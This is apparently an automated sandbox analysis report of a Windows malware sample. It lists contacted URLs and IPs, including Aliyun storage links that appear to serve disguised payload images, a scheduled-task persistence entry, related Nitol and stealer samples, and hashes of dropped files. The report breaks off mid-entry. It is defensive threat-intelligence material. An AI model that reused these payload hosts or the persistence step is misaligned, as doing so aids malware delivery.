http://education.ohio.gov/Topics/Student-Supports)	13478674376-78423498.01.exe	false		high
https://www.osha.gov/Publications/OSHA3990.pdf)	13478674376-78423498.01.exe	false		high
http://www.cdc.gov/coronavirus/2019-ncov/daily-life-coping/managing-stress-anxiety.html)	13478674376-78423498.01.exe	false		high
https://www.cdc.gov/handwashing/when-how-handwashing.html)	13478674376-78423498.01.exe	false		high
https://www.cdc.gov/tobacco/campaign/tips/diseases/depression-anxiety.html)	13478674376-78423498.01.exe	false		high
https://hdsuer.oss-cn-shanghai.aliyuncs.com/a.gifs.com	13478674376-78423498.01.exe, 00000000.00000003.3004759301.0000000001159000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/1-2246122658-3693405117-2476756634-1003	4mPVjj.exe, 00000006.00000002.3376240582.0000000000597000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.cdc.gov/coronavirus/2019-ncov/prevent-getting-sick/when-its-safe.html)	13478674376-78423498.01.exe	false		high
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg	4mPVjj.exe, 00000006.00000002.3375987513.000000000014E000.00000004.00000010.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3376443470.0000000000605000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3375987513.0000000000138000.00000004.00000010.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3377868720.0000000003CC0000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3375987513.000000000014B000.00000004.00000010.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3377868720.0000000003CDC000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3375987513.0000000000146000.00000004.00000010.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3375987513.0000000000141000.00000004.00000010.00020000.00000000.sdmp	false		high
https://www.cdc.gov/coronavirus/2019-ncov/daily-life-coping/shared-housing/index.html)	13478674376-78423498.01.exe	false		high
https://hdsuer.oss-cn-shanghai.aliyuncs.com/2	13478674376-78423498.01.exe, 00000000.00000003.3004759301.0000000001159000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lnks.gd/l/eyJhbGciOiJIUzI1NiJ9.eyJidWxsZXRpbl9saW5rX2lkIjoxMDQsInVyaSI6ImJwMjpjbGljayIsImJ1b	13478674376-78423498.01.exe	false		high
https://www.cdc.gov/coronavirus/2019-ncov/prevent-getting-sick/cleaning-disinfection.html)	13478674376-78423498.01.exe	false		high
https://www.cdc.gov/coronavirus/2019-ncov/hcp/guidance-prevent-spread.html#precautions)	13478674376-78423498.01.exe	false		high
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	13478674376-78423498.01.exe	false		high
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg_tN	4mPVjj.exe, 00000006.00000002.3377868720.0000000003CDC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ehs.yale.edu/sites/default/files/files/covid-19-cleaning-computers-electronics.pdf)	13478674376-78423498.01.exe	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/cps0(	13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe.0.dr	false		high
https://www.cdc.gov/coronavirus/2019-ncov/php/public-health-recommendations.html)	13478674376-78423498.01.exe	false		high
https://www.cdc.gov/coronavirus/2019-ncov/faq.html#COVID-19-and-Animals)	13478674376-78423498.01.exe	false		high
https://www.cdc.gov/coronavirus/2019-ncov/community/large-events/index.html)	13478674376-78423498.01.exe	false		high
https://www.osha.gov/shpguidelines/hazard-Identification.html)	13478674376-78423498.01.exe	false		high
https://www.cisa.gov/publication/guidance-essential-critical-infrastructure-workforce)	13478674376-78423498.01.exe	false		high
https://www.cdc.gov/coronavirus/2019-ncov/community/schools-childcare/guidance-for-schools.html)	13478674376-78423498.01.exe	false		high
http://www.symauth.com/rpa00	13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe.0.dr	false		high
https://www.osha.gov/SLTC/covid-19/)	13478674376-78423498.01.exe	false		high
https://www.cdc.gov/coronavirus/2019-ncov/prevent-getting-sick/social-distancing.html)	13478674376-78423498.01.exe	false		high
https://22mm.oss-cn-hangzhou.aliyuncs.com/ngzhou.aliyuncs.com/	4mPVjj.exe, 00000006.00000002.3376240582.0000000000597000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.cdc.gov/coronavirus/2019-ncov/travelers/after-travel-precautions.html)	13478674376-78423498.01.exe	false		high
https://22mm.oss-cn-hangzhou.aliyuncs.com/	4mPVjj.exe, 00000006.00000002.3376443470.0000000000605000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3376240582.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3376240582.0000000000597000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgca	4mPVjj.exe, 00000006.00000002.3377868720.0000000003CC0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://education.ohio.gov/getattachment/Topics/Student-Supports/Coronavirus/Child-Nutrition-%E2%80%9	13478674376-78423498.01.exe	false		high
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpghttps://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51	4mPVjj.exe, 00000006.00000002.3375987513.000000000014E000.00000004.00000010.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3376443470.0000000000605000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3375987513.000000000014B000.00000004.00000010.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3375987513.0000000000146000.00000004.00000010.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3375987513.0000000000141000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/17-2476756634-1003-Z	4mPVjj.exe, 00000006.00000002.3376240582.0000000000597000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0	13478674376-78423498.01.exe	false		high
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	13478674376-78423498.01.exe	false		high
https://www.cdc.gov/coronavirus/2019-ncov/cases-updates/summary.html)	13478674376-78423498.01.exe	false		high
https://22mm.oss-cn-hangzhou.aliyuncs.com/f.datpData	4mPVjj.exe, 00000006.00000002.3376240582.0000000000597000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.cdc.gov/coronavirus/2019-ncov/need-extra-precautions/people-at-higher-risk.html)	13478674376-78423498.01.exe	false		high
https://hdsuer.oss-cn-shanghai.aliyuncs.com/a.gifhttps://hdsuer.oss-cn-shanghai.aliyuncs.com/b.gifht	13478674376-78423498.01.exe, 00000000.00000003.3004759301.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022160747.0000000001123000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.samhsa.gov/find-treatment)	13478674376-78423498.01.exe	false		high
https://docs.google.com/presentation/d/14vaYnp9m6tmQ8DOx3-BQX72dFaslhN4ZsD-CysO9N3g/edit)	13478674376-78423498.01.exe	false		high
https://22mm.oss-cn-hangzhou.aliyuncs.com/f.dat6	4mPVjj.exe, 00000006.00000002.3376443470.0000000000605000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://hdsuer.oss-cn-shanghai.aliyuncs.com/b.gifU	13478674376-78423498.01.exe, 00000000.00000003.3022160747.0000000001159000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.cdc.gov/coronavirus/2019-ncov/symptoms-testing/symptoms.html)	13478674376-78423498.01.exe	false		high
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	13478674376-78423498.01.exe	false		high
http://www.suicidepreventionlifeline.org/GetHelp/LifelineChat.aspx)	13478674376-78423498.01.exe	false	Avira URL Cloud: safe	unknown
https://emergency.cdc.gov/coping/selfcare.asp)	13478674376-78423498.01.exe	false	Avira URL Cloud: safe	unknown
https://www.cdc.gov/niosh/topics/hierarchy/default.html)	13478674376-78423498.01.exe	false		high
http://www.apa.org/)	13478674376-78423498.01.exe	false		high
http://www.mindful.org/)	13478674376-78423498.01.exe	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/ngzhou.aliyuncs.com/17-2476756634-1003	4mPVjj.exe, 00000006.00000002.3376240582.0000000000597000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://hdsuer.oss-cn-shanghai.aliyuncs.com/b.gifJ	13478674376-78423498.01.exe, 00000000.00000003.3022160747.0000000001159000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.samhsa.gov/find-help/disaster-distress-helpline)	13478674376-78423498.01.exe	false		high
https://www.cdc.gov/coronavirus/2019-ncov/prevent-getting-sick/how-covid-spreads.html)	13478674376-78423498.01.exe	false		high
https://hdsuer.oss-cn-shanghai.aliyuncs.com/	13478674376-78423498.01.exe, 00000000.00000003.3022160747.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022160747.0000000001159000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, 4mPVjj.exe.0.dr	false		high
https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpgl	4mPVjj.exe, 00000006.00000002.3376240582.0000000000597000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.cdc.gov/coronavirus/2019-ncov/daily-life-coping/using-transportation.html)	13478674376-78423498.01.exe	false		high
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg	4mPVjj.exe, 00000006.00000002.3375987513.000000000014E000.00000004.00000010.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3376443470.0000000000605000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3375987513.000000000014B000.00000004.00000010.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3375987513.0000000000146000.00000004.00000010.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3375987513.0000000000141000.00000004.00000010.00020000.00000000.sdmp	false		high
https://www.cdc.gov/coronavirus/2019-ncov/community/general-business-faq.html)	13478674376-78423498.01.exe	false		high
https://hdsuer.oss-cn-shanghai.aliyuncs.com/b.gif5	13478674376-78423498.01.exe, 00000000.00000003.3022160747.0000000001159000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.cdc.gov/coronavirus/2019-ncov/prevent-getting-sick/cloth-face-cover.html)	13478674376-78423498.01.exe	false		high
https://www.cdc.gov/coronavirus/2019-ncov/daily-life-coping/living-in-close-quarters.html)	13478674376-78423498.01.exe	false		high
https://hdsuer.oss-cn-shanghai.aliyuncs.com/b.gifA	13478674376-78423498.01.exe, 00000000.00000003.3022160747.0000000001159000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/f.datM	4mPVjj.exe, 00000006.00000002.3376443470.0000000000605000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgLj	4mPVjj.exe, 00000006.00000002.3377868720.0000000003CC0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://hdsuer.oss-cn-shanghai.aliyuncs.com/b.gif;	13478674376-78423498.01.exe, 00000000.00000003.3022160747.0000000001159000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.eeoc.gov/wysk/what-you-should-know-about-covid-19-and-ada-rehabilitation-act-and-other-e	13478674376-78423498.01.exe	false		high
https://hdsuer.oss-cn-shanghai.aliyuncs.com/b.gif)	13478674376-78423498.01.exe, 00000000.00000003.3022160747.0000000001159000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	13478674376-78423498.01.exe	false		high
https://www.ada.gov/)	13478674376-78423498.01.exe	false		high
https://wwwn.cdc.gov/dcs/ContactUs/Form)	13478674376-78423498.01.exe	false	Avira URL Cloud: safe	unknown
http://www.oisd.gov.in/)	13478674376-78423498.01.exe	false	Avira URL Cloud: safe	unknown
https://www.cdc.gov/coronavirus/2019-ncov/community/critical-workers/implementing-safety-practices.h	13478674376-78423498.01.exe	false		high
https://www.cdc.gov/coronavirus/2019-ncov/if-you-are-sick/end-home-isolation.html)	13478674376-78423498.01.exe	false		high
http://ocsp.thawte.com0	13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, 4mPVjj.exe.0.dr	false		high
https://www.cdc.gov/coronavirus/2019-ncov/if-you-are-sick/steps-when-sick.html)	13478674376-78423498.01.exe	false		high
https://22mm.oss-cn-hangzhou.aliyuncs.com/ft	4mPVjj.exe, 00000006.00000002.3376240582.0000000000597000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
118.178.60.9	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	China		37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
47.101.28.195	sc-2jmu.cn-shanghai.oss-adns.aliyuncs.com.gds.alibabadns.com	China		37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589731
Start date and time:	2025-01-13 02:04:14 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	13478674376-78423498.01.exe
Detection:	MAL
Classification:	mal100.evad.winEXE@55/17@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:06:53	Task Scheduler	Run new task: LMO0S path: C:\Users\user\Documents\4mPVjj.exe
20:05:09	API Interceptor	941x Sleep call for process: 13478674376-78423498.01.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
118.178.60.9	1387457-38765948.15.exe	Get hash	malicious	Nitol	Browse
	2976587-987347589.07.exe	Get hash	malicious	Nitol, Xmrig	Browse
	2976587-987347589.08.exe	Get hash	malicious	Nitol	Browse
	2873466535874-68348745.02.exe	Get hash	malicious	Unknown	Browse
	2362476847-83854387.07.exe	Get hash	malicious	Nitol	Browse
	2o63254452-763487230.06.exe	Get hash	malicious	Nitol	Browse
	e2664726330-76546233.05.exe	Get hash	malicious	Nitol	Browse
	23567791246-764698008.02.exe	Get hash	malicious	Unknown	Browse
	287438657364-7643738421.08.exe	Get hash	malicious	Nitol	Browse
	2749837485743-7684385786.05.exe	Get hash	malicious	Nitol	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	1387457-38765948.15.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	2976587-987347589.07.exe	Get hash	malicious	Nitol, Xmrig	Browse	118.178.60.9
	2976587-987347589.08.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	2873466535874-68348745.02.exe	Get hash	malicious	Unknown	Browse	118.178.60.9
	2362476847-83854387.07.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	2o63254452-763487230.06.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	e2664726330-76546233.05.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	23567791246-764698008.02.exe	Get hash	malicious	Unknown	Browse	118.178.60.9
	287438657364-7643738421.08.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	2749837485743-7684385786.05.exe	Get hash	malicious	Nitol	Browse	118.178.60.9

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	3.elf	Get hash	malicious	Unknown	Browse	8.156.156.245
	i686.elf	Get hash	malicious	Mirai	Browse	47.104.110.148
	res.ppc.elf	Get hash	malicious	Unknown	Browse	47.114.43.16
	res.mpsl.elf	Get hash	malicious	Unknown	Browse	8.187.66.138
	6.elf	Get hash	malicious	Unknown	Browse	8.130.209.218
	1387457-38765948.15.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	1387457-38765948.15.exe	Get hash	malicious	Unknown	Browse	47.101.26.25
	80P.exe	Get hash	malicious	I2PRAT	Browse	120.26.116.232
	5.elf	Get hash	malicious	Unknown	Browse	123.56.46.120
	2976587-987347589.07.exe	Get hash	malicious	Nitol, Xmrig	Browse	118.178.60.103
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	3.elf	Get hash	malicious	Unknown	Browse	8.156.156.245
	i686.elf	Get hash	malicious	Mirai	Browse	47.104.110.148
	res.ppc.elf	Get hash	malicious	Unknown	Browse	47.114.43.16
	res.mpsl.elf	Get hash	malicious	Unknown	Browse	8.187.66.138
	6.elf	Get hash	malicious	Unknown	Browse	8.130.209.218
	1387457-38765948.15.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	1387457-38765948.15.exe	Get hash	malicious	Unknown	Browse	47.101.26.25
	80P.exe	Get hash	malicious	I2PRAT	Browse	120.26.116.232
	5.elf	Get hash	malicious	Unknown	Browse	123.56.46.120
	2976587-987347589.07.exe	Get hash	malicious	Nitol, Xmrig	Browse	118.178.60.103

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	Setup.msi	Get hash	malicious	Unknown	Browse	47.101.28.195 118.178.60.9
	L7GNkeVm5e.exe	Get hash	malicious	LummaC	Browse	47.101.28.195 118.178.60.9
	NDWffRLk7z.exe	Get hash	malicious	LummaC	Browse	47.101.28.195 118.178.60.9
	g3toRYa6JE.exe	Get hash	malicious	LummaC	Browse	47.101.28.195 118.178.60.9
	lBb4XI4eGD.exe	Get hash	malicious	LummaC	Browse	47.101.28.195 118.178.60.9
	UWYXurYZ2x.exe	Get hash	malicious	LummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty Stealer	Browse	47.101.28.195 118.178.60.9
	setup.msi	Get hash	malicious	Unknown	Browse	47.101.28.195 118.178.60.9
	gem1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	47.101.28.195 118.178.60.9
	Setup.msi	Get hash	malicious	Unknown	Browse	47.101.28.195 118.178.60.9
	gem2.exe	Get hash	malicious	Unknown	Browse	47.101.28.195 118.178.60.9

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\9eAesx\FLgX3z.exe	1387457-38765948.15.exe	Get hash	malicious	Nitol	Browse
	2976587-987347589.07.exe	Get hash	malicious	Nitol, Xmrig	Browse
	2976587-987347589.08.exe	Get hash	malicious	Nitol	Browse
	2873466535874-68348745.02.exe	Get hash	malicious	Unknown	Browse
	2362476847-83854387.07.exe	Get hash	malicious	Nitol	Browse
	2o63254452-763487230.06.exe	Get hash	malicious	Nitol	Browse
	e2664726330-76546233.05.exe	Get hash	malicious	Nitol	Browse
	23567791246-764698008.02.exe	Get hash	malicious	Unknown	Browse
	287438657364-7643738421.08.exe	Get hash	malicious	Nitol	Browse
	2749837485743-7684385786.05.exe	Get hash	malicious	Nitol	Browse

Created / dropped Files

C:\Program Files (x86)\9eAesx\FLgX3z.exe

Download File

Process:	C:\Users\user\Documents\4mPVjj.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54152
Entropy (8bit):	6.64786972992462
Encrypted:	false
SSDEEP:	768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
MD5:	7B6586E21FBC8F2F0BB784A1A8FC65B4
SHA1:	E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
SHA-256:	7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
SHA-512:	E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 1387457-38765948.15.exe, Detection: malicious, Browse Filename: 2976587-987347589.07.exe, Detection: malicious, Browse Filename: 2976587-987347589.08.exe, Detection: malicious, Browse Filename: 2873466535874-68348745.02.exe, Detection: malicious, Browse Filename: 2362476847-83854387.07.exe, Detection: malicious, Browse Filename: 2o63254452-763487230.06.exe, Detection: malicious, Browse Filename: e2664726330-76546233.05.exe, Detection: malicious, Browse Filename: 23567791246-764698008.02.exe, Detection: malicious, Browse Filename: 287438657364-7643738421.08.exe, Detection: malicious, Browse Filename: 2749837485743-7684385786.05.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Music\destopbak.ini

Download File

Process:	C:\Users\user\Documents\4mPVjj.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:k:k
MD5:	55A54008AD1BA589AA210D2629C1DF41
SHA1:	BF8B4530D8D246DD74AC53A13471BBA17941DFF7
SHA-256:	4BF5122F344554C53BDE2EBB8CD2B7E3D1600AD631C385A5D7CCE23C7785459A
SHA-512:	7B54B66836C1FBDD13D2441D9E1434DC62CA677FB68F5FE66A464BAADECDBD00576F8D6B5AC3BCC80844B7D50B1CC6603444BBE7CFCF8FC0AA1EE3C636D9E339
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\b[1].gif

Download File

Process:	C:\Users\user\Desktop\13478674376-78423498.01.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	125333
Entropy (8bit):	7.993522712936246
Encrypted:	true
SSDEEP:	3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
MD5:	2CA9F4AB0970AA58989D66D9458F8701
SHA1:	FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
SHA-256:	5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
SHA-512:	AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\s[1].jpg

Download File

Process:	C:\Users\user\Desktop\13478674376-78423498.01.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	8299
Entropy (8bit):	7.9354275320361545
